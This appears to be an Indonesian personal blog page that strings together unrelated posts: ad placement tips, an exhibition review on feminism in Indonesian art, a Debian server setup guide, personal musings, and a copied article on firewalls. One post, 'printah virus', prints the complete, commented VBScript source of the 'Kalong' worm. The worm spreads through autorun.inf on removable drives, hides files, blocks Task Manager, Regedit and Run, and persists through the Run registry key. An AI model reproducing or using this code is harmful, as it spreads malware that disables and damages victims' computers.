BLOGGER TEMPLATES AND TWITTER BACKGROUNDS

gfu

Kamis, 15 Maret 2012

Cara Pasang Iklan di Blog. Baiklah kali ini saya akan coba share Tutorial Cara Memasang Iklan di Blog. Mungkin tutorial ini dapat berguna utk membantu para sahabat-sahabat blogger yang sedang ingin membuat blognya memiliki penghasilan tambahan lewat memasang iklan. Dan masih bingung bagaimana cara memasang iklan Y jitu dan tepat agar ngeklop dengan template dan isi postingan. Walaupun Trafik blog masih minimalis , dengan sedikit trik memasang iklan dengan memilih ukuran dan tempat yang pas dapat kita maksimalkan peningkatkan pendapatan blog. hehe Amien.
Untuk iklan itu sendiri kita bisa mendapatkannya Gratis dari para web Y menyediakan Pasang Iklan Gratis di blog seperti iklan PPC, PTC, CPM, Program Affiliasi dan lain-lain. Dan tentunya dengan berbagai macam persyaratan yang diberikan kepada kita sebagai penerbit [publisher]. Untuk penjelasan lebih lanjutnya mengenai Cara menghasilkan Uang di Blog bisa dilihat Disini.
Sedikit pemahaman tentang bentuk dan model iklan PPC. Umumnya dibedakan menjadi 2 model yaitu iklan teks dan iklan gambar/Banner. Dengan bentuk Horizontal , Vertikal dan Square yang membedakannya. Dan biasanya Iklan yang berbentuk horizontal memiliki berbagai ukuran seperti : 728 X 90 , 468 X 60 , 125 X 125 , 234 X 60 dll . Dan Iklan yang berbentuk Vertikal umumnya memiliki ukuran seperti : 120 X 600 , 160 X 600 , 120 X 240. Sedangkan Bentuk Square umumnya memiliki ukuan : 200 X 200 , 250 X 250 , 300 X 250 , 336 X 280. Dan dari semua model dan bentuk iklan tersebut yang harus kita lakukan adalah memilih iklan yang pas dan paling ngeklop sesuai dengan kondisi template blog kita. Disini kita harus benar-benar jeli dalam memilih lokasi mana saja yang paling pas dan tepat dalam memasang iklan agar iklan yang dipasang tidak terlalu berlebihan. Iklan yang berlebihan dipasang diblog membawa dampak yang kurang baik pula dalam optimasi SEO dan iklan, karena biasanya blog yang memiliki iklan yang sumpek / banyak biasanya pengunjung blog merasa kurang nyaman dengan kondisi seperti itu. Dan menyebabkan para visitor blog kita tidak berlama-lama utk membaca di blog kita. Dan sudah paham utk tidak mengklik iklan yang ada di blog atau biasanya fenomena ini disebut dengan ads blindness.
Untuk itulah saya akan membuat sedikit tutorial Cara Memasang Iklan yang sesuai selera dan Pas pada Blog, diantaranya meliputi :
1. Cara Pasang Iklan Berdampingan dengan Postingan Blog
2. Cara Pasang Iklan Dibawah Judul Postingan
3. Cara Pasang Iklan Otomatis Dibawah Postingan
4. Cara Pasang Iklan Melayang di Atas Header Blog
5. Cara Pasang Iklan Melayang di Blog

Baca Selengkapnya di : Cara Pasang Iklan di Blog | AF Sahabat Artikel http://abyfarhan7.blogspot.com/2012/03/cara-pasang-iklan-di-blog.html#ixzz1pC2PK9FZ

Senin, 21 Maret 2011

swni

Intimate Distance: Menelusuri Jejak Wacana Feminisme dalam Seni Rupa Indonesia" demikian judul pembuka kata pengantar dari kurator pameran ini. Menurut sang kurator, "Intimate Distance" adalah catatan kaki dari buku "Indonesian Women Artists: The Curtain Opens". Buku ini ditulis oleh tiga penulis wanita; Wulan Dirgantoro yang juga kurator pameran ini berdiam di Australia, Carla Bianpoen (yang tulisannya mengenai seni dan budaya sering saya jumpai di harian ibu kota) berdiam di Jakarta, serta Farah Wardani ahli sejarah seni yang berdiam di Jogjakarta. Dari jarak kediaman mereka yang cukup berjauhan, mereka mengumpulkan catatan-catatan mengenai seniman wanita Indonesia. Suatu keakraban yang cukup berjarak. Tapi dengan kecanggihan dunia maya saat ini, jarak menjadi suatu hal yang sangat relatif.

Dari harian Kompas (Senin 6 Agustus 2007) Ninuk Mardiana Pambudy, jurnalis Kompas, menulis artikel "Membaca Perempuan Melalui Seni Rupa". Isi artikel ini banyak mengupas isi diskusi antara para perupa dan peserta diskusi pada pameran ini. Kata "Feminisme" rupanya banyak mendapat sorotan dalam diskusi ini. Tapi seperti yang diungkapkan pematung Dolorosa Sinaga kepada Kompas: "Untuk saya sebutan tidak penting, karena karya saya dari awal adalah membela yang termajinalkan dan itu adalah perempuan".

Saya sendiri ingin mencoba mengapresiasi apa yang saya lihat dalam pameran ini. Saya tidak ingin ikut mencari tahu apakah seniman wanita Indonesia terekam dalam sejarah seni rupa, atau apakah karya mereka diakui setara dengan seniman lelaki oleh para kolektor benda seni. Saya justru tertarik sekali untuk menelusuri jejak wacana feminisme dari karya-karya yang ditampilkan. Menarik sekali bahwa semua karya ini adalah karya perupa perempuan. Artinya semua keindahan maupun kekerasan yang tampil adalah hasil adaptasi sang perupa perempuan terhadap permasalahan kaumnya, maupun bangsanya.

Memasuki pelataran Galeri Nasional Indonesia di belakang penerima tamu adalah karya Iriantine Karnaya, Gua Garba. Sebenarnya saya merasa karya ini akan sangat kuat mengirimkan pesannya bila diletakkan dengan latar belakang dekor hitam dan memakai bantuan permainan cahaya. Sherry Ortner seorang antropolog yang banyak mempelajari mengenai wanita, budaya dan masyarakatnya, mengatakan bahwa wanita sangat dekat dengan alam. Daya kreativitas wanita sudah terpenuhi secara alami melalui proses melahirkan. Secara alamiah wanita menciptakan dari keberadaan dirinya sendiri. Dalam konteks ini Gua Garba merupakan kata pembuka yang sangat tepat untuk menelusuri wacana feminisme dalam seni rupa Indonesia. Gua Garba merupakan bagian dari penciptaan tetapi seringkali mendapat perlakuan yang tidak sesuai dengan kodrat suci yang diembannya. Karya Iriantine Karnaya ini memiliki arti yang sangat mendalam, dan bisa menghasilkan berbagai macam tafsir sesuai dengan pengalaman dan pola pikir pengamat.

Menurut sang kurator dalam kata pengantar katalog, istilah feminisme memiliki stigma yang sangat kuat karena cenderung dikaitkan dengan liberalisme dan radikalisme. Karena itu wacana gender menjadi lebih populer daripada wacana feminisme. Istilah ini memang tidak hanya menjadi topik hangat untuk komunitas Asia yang masih sangat kuat pola kehidupan paternalistiknya, tapi juga menjadi wacana perbincangan di dunia akademik Barat seperti yang diungkapkan Henrietta L. Moore dalam bukunya "Feminisme dan Antropologi". Dalam buku ini didefinisikan secara sederhana arti feminisme yaitu kesadaran wanita akan penindasan dan pemerasan dalam kerja, di rumah dan di masyarakat, serta dapat juga diartikan sebagai kesadaran tindakan politik yang dilakukan oleh wanita untuk mengubah situasi ini.

Dalam hal ini karya perupa Dolorosa Sinaga seperti menggambarkan pola feminisme yang sesuai dengan masyarakat kita. "General, have you read the book of Love?". Wanita sebagai sang penjaga kehidupan selama sembilan bulan sepuluh hari di awal kehidupan manusia bisa menjadi orang yang sangat penting dalam mengajarkan ilmu tentang Kasih. Sebagai ibu, sebagai istri, bahkan sebagai anak, wanita mampu berperan mengingatkan sang pemimpin. Sangat mungkin tidak terlihat di permukaan, sehingga tampak seakan-akan diam tak bertindak. Mungkin inilah pola feminisme yang dipilih sebagian besar kaum wanita Indonesia, berjuang dalam diam. Ini juga yang mungkin ingin diungkapkan oleh Endang Lestari yang lahir di Banda Aceh dalam karyanya "Percakapan Dalam Senyap".





Terkadang wanita menjadi terlena duduk di ketinggian menerima sanjungan dan pujaan, melupakan carut marut kehidupan yang ada disekitarnya. Bisa jadi inilah yang ingin dikomunikasikan dalam wajah tenang Kartini yang memeluk trophynya dalam karya Hening Purnawati berjudul "What happened Mom?"

Atau wanita menjadi keras dan berjuang setangguh lelaki seperti wanita muda modern yang berkebaya dan bercelana panjang mengacungkan jari layaknya menembak target dengan pistol karya lukis Astari Rasjid.

Bisa jadi wanita menjadi pasif dan hanya bisa mengeluh "Baju yang Kau Pintal Terlalu Berat Bagiku" seperti yang mungkin tergambarkan dalam karya Titarubi. Entah karena kaum lelaki, entah karena tuntutan masyarakat, tapi beban sebagai wanita terkadang memang cukup berat. Masyarakat merasa berhak ikut serta menentukan pilihan-pilihan seorang wanita, padahal kedewasaan seseorang terletak dari kemampuannya memilih dan kesiapannya menghadapi konsekuensi atas pilihannya.

Ada satu karya yang nama perupanya terluput dari catatan penulis. Karya ini tidak kalah menarik untuk ditampilkan dalam catatan kali ini karena di mata penulis menggambarkan kritik seorang perupa wanita terhadap pria yang menjadi wakil masyarakat.

Ketelanjangan yang tampil dalam pameran ini tidak membawa sensasi sensual. Memang sesekali perlu juga melihat wanita dari kaca mata wanita sendiri. Bukan untuk memisahkan gender tapi mungkin kita memang perlu mangakui adanya pengaruh kedekatan dengan persoalan kodrati seperti tergambar dalam karya Laksmi Shitaresmi, serta mungkin karena memang bahasa ungkap wanita dan pria yang berbeda. Kan katanya Women are from Venus and Men are from Mars...

Selasa, 22 Februari 2011

printah virus

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Kamis, 02 Desember 2010

membangun pc router dan server dengan debian






BAB II
KONFIGURASI

3.1 Konfigurasi

 DNS SERVER
entis:/home/ toy # apt-get install bind
entis:/home/ toy # cd /etc/bind/
entis:/etc/bind# cp named.conf{,.orig}
entis:/etc/bind# cp db.local db.entis
entis:/etc/bind# cp db.127 db.192
entis:/etc/bind# nano named.conf
zone "entis.com" {
type master;
file "/etc/bind/db.entis";
};
zone "16.168.193.in-addr.arpa" {
type master;
file "/etc/bind/db.192";
};

entis:/etc/bind# nano db.entis
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.entis.com. entis.entis.com. (
1 ; Serial
604800 ; Refresh
86400 ; Retry
2319200 ; Expire
604800 ) ; Negative Cache TTL
;
IN NS ns1.entis.com.
IN MX 10 mail.entisi.com.
IN A 193.168.16.2
ns1 IN A 193.168.16.2
www IN A 193.168.16.2
mail IN A 193.168.16.2
ftp IN CNAME www

entis:/etc/bind# nano db.193
;
; BIND reverse data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.entis.com. entis.entis.com. (
2 ; Serial
604800 ; Refresh
86400 ; Retry
2319200 ; Expire
604800 ) ; Negative Cache TTL
;
IN NS ns1.entis.com.
2 IN PTR ns1.entis.com.
2 IN PTR www. entis.com.
2 IN PTR mail.entis.com.
2 IN PTR entis.com.

Restart dengan perintah :
entis:/etc/bind# /etc/init.d/bind restart
 WEB Server
entis:~# apt-get install apache2
entis:~# nano /etc/apache2/sites-available/default
# RedirectMatch ^/$ /apache2-default/ (beri tanda pagar)
entis:~# apt-get install php5
entis:~# nano /var/www /index.html

entis sutisna

My Biodata














entis:~# apt-get install mysql-server
entis:~# apt-get install phpmyadmin
entis:~# apt-get install mysql-server
entis:~# mysqlamin –u root password coscoloyong ( password login )
Restart dengan perintah :
entis:/etc/bind# /etc/init.d/apache2 restart
 FTP
entis:~# apt-get install proftpd
entis:~# nano /etc/proftpd/proftpd.conf
Hilangkan tanda # nya pada bagian

……………………
…………………


Restart dengan perintah :
entis# /etc/init.d/proftpd restart
 SSH
entis:~# apt-get install ssh
entis:~# nano /etc/ssh/sshd_config
Restart dengan perintah :
entis:/home/zulpi# /etc/init.d/ssh restart

 FIREWALL
• # iptables -A FORWARD -p tcp -s 192.168.16.2 --dport 22 -j DROP (ssh)
• # iptables -A FORWARD -p tcp -s 192.168.16.2--dport 21 -j DROP (ftp)
• # iptables -A FORWARD -p icmp -s 192.168.16.2-j DROP (icmp)




Minggu, 28 November 2010

cara cari uang

Keinginanku hari ini, tepatnya akhir-akhir ini adalah memiliki mobil kecil. Meski tidak harus baru. Mobil yang sangat efisien nyaman dikendarai di segala jenis jalan dan berbagai cuaca yang tidak selalu nyaman. Maklum Jakarta, sewaktu-waktu bisa terjadi banjir. Jalan yang berlobang dan pembangunan infrastruktur yang tumpang tindih memerlukan mobil yang khusus. Bukanya aku tidak bersyukur dengan mobil yang ada, tapi memang mobil keluarga yang telah saya punya ini agak terlalu besar untuk dipakai aktivitas sehari-hari. Aku ingin memiliki mobil dengan penumpang yang sedikit, irit bahan bakar dan mudah untuk dirawat. City car begitulah istilah yang sering dipakai sekarang.

Benar-benar seperti orang yang sedang "kayunyun" (jatuh cinta) setiap waktu luang aku mencari mobil ini di internet atau bertanya ke mbah google. Atau mencari di komunitas/forum jual beli mobil. Saat ini yang yang aku target adalah sejenis suzuki jimny katana. Sudah beberapa kali saya menemukan yang tipenya cocok tapi setelah di cek ditempat kondisi mobilnya sangat memprihatinkan. Banyak karat dan lobang yang mengganggu pamdangan mata. Mengapa suzuki? sudah 3 kali berganti mobil saya selalu memilih suzuki karena selama menggunakan mobil ini tidak pernah menemui masalah yang menyusahkan. Bengkel mudah ditemukan, bahkan montir dipinggir jalanpun bisa diminta jasanya.Sparepart mudah didapat dan cukup murah.Disamping irit bahan bakar. Oleh karenannya hati saya terpikat ke suzuki jimny katana.

Performen

The Jimny’s 1.3-litre petrol engine now gives 84bhp and 81lb ft of torque, but it’s still slow. The manual version takes over 14 seconds to reach 60mph and the four-speed auto over 17; top speed is just 87mph (84mph auto). Mind you, given the Jimny’s top-heavy feel and poor grip, you wouldn’t want to go any faster. Off-road, it holds its own.

Semoga mimpi indah ini segera terwujud dengan kasih sayang Tuhan. Amiin

Read More......
Bookmark and Share
Jumat, 05 Februari 2010
MENGENAL BISNIS ONLINE : 3. DOLAR PERTAMAKU
3 komentar 20.57 Diposkan oleh OSCAR JR
Label: bisnis modal kecil, bisnis sampingan

DOLLAR pertama, setelah merangkak tertatih-tatih mencoba mempelajari bisnis online, sayapun mendapat kiriman dollar yang pertama sebesar US$ 0,08 ke rekening PayPal yang kubuat sebelumnya. Testimoni buat diri sendiri bahwa ternyata memang dunia online bisa menghasilkan uang. Inilah dolar pertama yang menjadi titik keyakinan untuk semakin menggeluti dunia bisnis online. Luar biasa “Surprise” dan Syukur atas hasil usaha keras untuk mempercayai bisnis online. Bukan angka 0.08 dolarnya tetapi bahagianya melihat akun PayPal yang terisi dolar untuk pertama kalinya.



Awalnya memang banyak temen bahkan istri sendiri meremehkan," yah....nol koma nol". Tetapi buatku secara pribadi ini adalah awal yang menjadi bukti bahwa aku bisa mengais rezeki dari internet. Dengan keyakinan yang belum 100% kucoba untuk bertahan dan dengan perjalanan waktu saya menimba ilmu dari sumber-sumber yang sudah berpengalaman. Bagaimana dan apa saja sumber uang yang bisa di gali dari dunia internet. Rupanya Tuhan memperhatikan kegelisahanku sehingga dimudahkan jalan rizki ini. Dan mengalirlah recehan rupiah dan dolar mengalir ke rekeningku. Puji Syukur atas segala kemudahan yang Engkau berikan, Tuhan yang maha pengasih dan penyayang.

WAH, inilah cita-citaku saat ini. ya WAH yang berarti "work at home" ini gelar bagiku saat ini. Dengan usia yang tidak lagi muda dan tenaga yang dulunya pernah perkasa sebaiknya saya beralih strategi yaitu work at home. Pekerjaan yang tidak terpengaruh dengan macetnya kota Jakarta, debu dan asap knalpot, dikejar-kejar waktu takut terlambat dan segala kekurangnyamanan kota besar. Inilah solusi. Langkah berikutnya adalah menemukan cara yang tepat sehingga yang awalnya $0,08 bisa menjadi $8 perhari, besok nya $80 perhari, lusanya $800 perhari, hari yang berikutnya $8000 perhari. Semoga Tuhan mengkabulkan keinginan saya ini, amii

kata hati

meski kau telah tebarkan pesona untukmu..........
tapi kata hati ku sulit tuk mendengarkan.
tapi ku hanya bisa merasakan apa yang kurasa........

Sabtu, 27 November 2010

fire wall

FIREWALL
Firewall atau tembok-api adalah sebuah sistem atau perangkat yang mengizinkan lalu lintas jaringan yang dianggap aman untuk melaluinya dan mencegah lalu lintas jaringan yang tidak aman. Umumnya, sebuah tembok-api diterapkan dalam sebuah mesin terdedikasi, yang berjalan pada pintu gerbang (gateway) antara jaringan lokal dan jaringan lainnya. Tembok-api umumnya juga digunakan untuk mengontrol akses terhadap siapa saja yang memiliki akses terhadap jaringan pribadi dari pihak luar. Saat ini, istilah firewall menjadi istilah lazim yang merujuk pada sistem yang mengatur komunikasi antar dua jaringan yang berbeda. Mengingat saat ini banyak perusahaan yang memiliki akses ke Internet dan juga tentu saja jaringan berbadan hukum di dalamnya, maka perlindungan terhadap modal digital perusahaan tersebut dari serangan para peretas, pemata-mata, ataupun pencuri data lainnya, menjadi hakikat.
Artikel Populer IlmuKomputer.Com Copyright © 2009 IlmuKomputer.Com Penggunaan Fiirewallll Unttuk Menjjaga Keamanan Siisttem Jariingan Komputter Agus Aan Jiwa P. studywithaan@gmail.com http://agus-aan.web.ugm.ac.id Abstrak : Dalam sebuah jaringan, istilah “firewall” tentunya terdengar sudah tidak asing lagi. Karena saat ini firewall sudah banyak digunakan, terutama dalam sebuah jaringan komputer yang terkoneksi langsung ke jaringan publik atau yang dikenal dengan internet.
Dengan pesatnya perkembangan internet, dapat memberikan dampak positif bagi kita sebagai penyedia layanan informasi dan komunikasi, selain itu internet juga dapat memberikan dampak negatif sekaligus ancaman bagi penggunanya. Sehingga akses jaringan kita dengan internet harus dibatasi oleh sebuah pembatas yang dikenal dengan firewall. Kata Kunci : firewall, jaringan komputer.
Pendahuluan Saat ini internet sudah semakin banyak diakses oleh banyak orang. Penggunaan internet nampaknya sudah semakin tidak dapat dipisahkan di berbagai bidang dalam kehidupan manusia di dunia ini. Dengan adanya internet, seseorang dapat dengan mudah mengetahui dan mendapatkan informasi, mudah berkomunikasi dengan rekan tanpa memandang jarak dan waktu, mudah melakukan transaksi dimanapun dan kapanpun, mudah melakukukan aktivitas belajar-mengajar jarak jauh dan masih banyak lagi kemudahan yang diberikan oleh internet. Seolah-olah dengan adanya internet kita merasakan bahwa dunia itu seperti tanpa batas. Di belahan dunia manapun saat ini sudah dapat dihubungkan dengan internet, yang menyediakan beragam informasi yang dapat diakses oleh siapapun. Lisensi Dokumen: Copyright © 2009 IlmuKomputer.Com Seluruh dokumen di IlmuKomputer.Com dapat digunakan, dimodifikasi dan disebarkan secara bebas untuk tujuan bukan komersial (nonprofit), dengan syarat tidak menghapus atau merubah atribut penulis dan pernyataan copyright yang disertakan dalam setiap dokumen. Tidak diperbolehkan melakukan penulisan ulang, kecuali mendapatkan ijin terlebih dahulu dari IlmuKomputer.Com. Halaman | 1 Sejalan dengan pesatnya perkembangan internet, selain memberikan dampak positif sebagai penyedia layanan informasi dan komunikasi, internet juga dapat memberikan dampak negatif sekaligus ancaman bagi penggunanya. Ancaman itu bentuknya berbagai macam dari virus, trojan, cacker, dan yang lainnya.
Dengan akses yang tak terbatas, diibaratkan rumah yang tidak memiliki tembok yang dapat dimasuki oleh siapa saja yang berkepentingan tanpa dapat diketahui niatnya baik atapun buruk. Dengan keadaan seperti itu, sudah seharusnya kita memberikan perlindungan terhadap rumah kita dengan mendirikan tembok baik dari beton atau kayu, sehingga akses ke rumah lebih mudah dikontrol. Sama halnya dengan komputer yang terhubung dengan internet, juga harus diberikan tembok pelindung yang sering disebut dengan “firewall’ untuk melindungi komputer dari ancaman yang datang dari internet. Mengenal Sejarah Firewall Arman (2007) menyatakan bahwa, network firewall yang pertama muncul pada akhir era 1980- an yaitu berupa perangkat router yang dipakai untuk memisahkan suatu network menjadi jaringan lokal (LAN) yang lebih kecil, dimana kondisi ini penggunaan firewall hanya dimaksudkan untuk mengurangi masalah peluberan (spill over) data dari LAN ke seluruh jaringan untuk mencegah masalah-masalah semacam error pada manajemen jaringan, atau aplikasi yang terlalu banyak menggunakan sumber daya meluber ke seluruh jaringan.
Penggunaan firewall untuk keperluan sekuriti (security firewall) pertama kali digunakan pada awal dekade 1990-an, berupa router IP dengan aturan filter tertentu. Aturan sekuriti saat itu berupa sesuatu seperti: ijinkan setiap orang “di sini” untuk mengakses “ke luar sana”, juga cegahlah setiap orang (atau apa saja yang tidak disukai) “di luar sana” untuk masuk “ke sini”. Firewall semacam ini cukup efektif, tetapi memiliki kemampuan yang terbatas. Seringkali sangat sulit untuk menggunakan aturan filter secara benar. Sebagai contoh, dalam beberapa kasus terjadi kesulitan dalam mengenali seluruh bagian dari suatu aplikasi yang dikenakan restriksi. Dalam kasus lainnya, aturan filter harus dirubah apabila ada perubahan “di luar sana”. Firewall generasi selanjutnya lebih fleksibel, yaitu berupa sebuah firewall yang dibangun pada apa yang disebut “Bastion Host”. Firewall komersial yang pertama dari tipe ini, yang menggunakan filter dan gateway aplikasi (proxies), kemungkinan adalah produk dari Digital Equipment Corp (DEC). DEC yang dibangun berdasarkan firewall korporat DEC. Brian Reid dan tim engineering di laboratorium sistem jaringan DEC di Pallo Alto adalah pencipta firewall DEC. Firewall komersial pertama dikonfigurasi untuk, dan dikirimkan kepada pelanggan pertamanya, sebuah perusahaan kimia besar yang berbasis di pantai timur AS pada 13 Juni 1991. Dalam beberapa bulan kemudian, Marcus Ranum dari Digital Corp. menciptakan security proxies dan menulis ulang sebagian besar kode program firewall. Produk firewall tersebut kemudian diproduksi massal dengan nama dagang DEC SEAL (singkatan dari Security External Access Link). DEC SEAL tersusun atas sebuah sistem eksternal yang disebut gatekeeper sebagai satu-satunya sistem yang dapat berhubungan dengan internet, sebuah filtering gateway yang disebut gate, dan sebuah mailhub internal (gambar 1). “Bastion Host” adalah sistem/bagian yang dianggap tempat terkuat dalam sistem keamanan jaringan oleh administrator.atau dapat disebut bagian terdepan yang dianggap paling kuat dalam menahan serangan, sehingga menjadi bagian terpenting dalam pengamanan jaringan,
biasanya merupakan komponen firewall atau bagian terluar sistem publik. Umumnya Bastion host akan menggunakan Sistem operasi yang dapat menangani semua kebutuhan misal : Unix, linux, NT (Muammar W. K, 2004). Firewall untuk pertama kalinya dilakukan dengan menggunakan prinsip “non-routing” pada sebuah Unix host yang menggunakan 2 buah network interface card, network interface card yang pertama di hubungkan ke internet (jaringan lain) sedangkan yang lainnya dihubungkan ke PC (jaringan lokal)(dengan catatan tidak terjadi “route” antara kedua network interface card di PC ini). Definisi Firewall Istilah “firewall” sendiri sebenarnya juga dikenal dalam disiplin lain, dan dalam kenyataannya, istilah ini tidak hanya bersangkutan dengan terminologi jaringan. Kita juga menggunakan firewall, misalnya untuk memisahkan garasi dari rumah, atau memisahkan satu apartemen dengan apartemen lainnya.
Dalam hal ini, firewall adalah penahan (barrier) terhadap api yang dimaksudkan untuk memperlambat penyebaran api seandainya terjadi kebakaran sebelum petugas pemadam kebakaran datang untuk memadamkan api. Contoh lain dari firewall juga bisa ditemui pada kendaran bermotor, dimana firewall memisahkan antara ruang penumpang dan kompartemen mesin. Untuk firewall di dalam terminologi jaringan, memiliki beberapa pengertian antara lain adalah sebagai berikut : Firewall didefinisikan sebagai suatu cara atau mekanisme yang diterapkan baik terhadap hardware, software ataupun sistem itu sendiri dengan tujuan untuk melindungi, baik dengan menyaring, membatasi atau bahkan menolak suatu atau semua hubungan/kegiatan suatu segmen pada jaringan pribadi dengan jaringan luar yang bukan merupakan ruang lingkupnya (Muammar W. K, 2004). Firewall (dari buku Building Internet Firewalls, oleh Chapman dan Zwicky) didefinisikan sebagai sebuah komponen atau kumpulan komponen yang membatasi akses antara sebuah jaringan yang diproteksi dan internet, atau antara kumpulan-kumpulan jaringan lainnya. Stiawan (2008) mengatakan bahwa, firewall adalah sebuah komputer yang memproteksi jaringan dari jaringan yang tidak dipercaya yang memisahkan antara jaringan lokal dengan jaringan publik, dengan melakukan metode filtering paket data yang masuk dan keluar (Marcus Goncalves, Firewall Completed:227) Arman (2007) mendefinisikan firewall sebagai sebuah titik diantara dua/lebih jaringan dimana semua lalu lintas (trafik) harus melaluinya (chooke point); trafik dapat dikendalikan oleh dan diautentifikasi melalui sautu perangkat, dan seluruh trafik selalu dalam kondisi tercatat (logged). Dari beberapa definisi diatas, penulis dapat memberikan definisi dimana firewall adalah sebuah pembatas antara suatu jaringan lokal dengan jaringan lainnya yang sifatnya publik (dapat diakses oleh siapapun) sehingga setiap data yang masuk dapat diidentifikasi untuk dilakukan penyaringan sehingga aliran data dapat dikendalikan untuk mencegah bahaya/ancaman yang datang dari jaringan publik .
Tujuan Penggunaan Terdapat beberapa tujuan penggunaan firewall, antara lain : a) Firewall biasanya digunakan untuk mencegah atau mengendalikan aliran data tertentu. Artinya, setiap paket yang masuk atau keluar akan diperiksa, apakah cocok atau tidak dengan kriteria yang ada pada standar keamanan yang didefinisikan dalam firewall. b) Untuk melindungi dengan menyaring, membatasi atau bahkan menolak suatu atau semua hubungan/kegiatan suatu segmen pada jaringan pribadi dengan jaringan luar yang bukan merupakan ruang lingkupnya. Segmen tersebut dapat merupakan sebuah workstation, server, router, atau local area network (LAN) seperti gambar 2. c) penggunaan firewall yang dapat mencegah upaya berbagai trojan horses, virus, phishin, spyware untuk memasuki sistem yang dituju dengan cara mencegah hubungan dari luar, kecuali yang diperuntukan bagi komputer dan port tertentu seperti gambar 3. d) Firewall akan mem-filter serta meng-audit traffic yang melintasi perbatasan antara jaringan luar maupun dalam. Gambar 2 Firewall sebagai pembatas LAN dengan internet Firewall mencegah virus dan ancaman lain masuk ke jaringan Teknik-Teknik yang Digunakan firewall Adapun beberapa teknik yang digunakan dalam firewall adalah sebagai berikut : Service control (kendali terhadap layanan) Berdasarkan tipe-tipe layanan yang digunakan di Internet dan boleh diakses baik untuk kedalam ataupun keluar firewall. Biasanya firewall akan mencek no IP Address dan juga nomor port yang di gunakan baik pada protokol TCP dan UDP, bahkan bisa dilengkapi software untuk proxy yang akan menerima dan menterjemahkan setiap permintaan akan suatu layanan sebelum mengijinkannya.
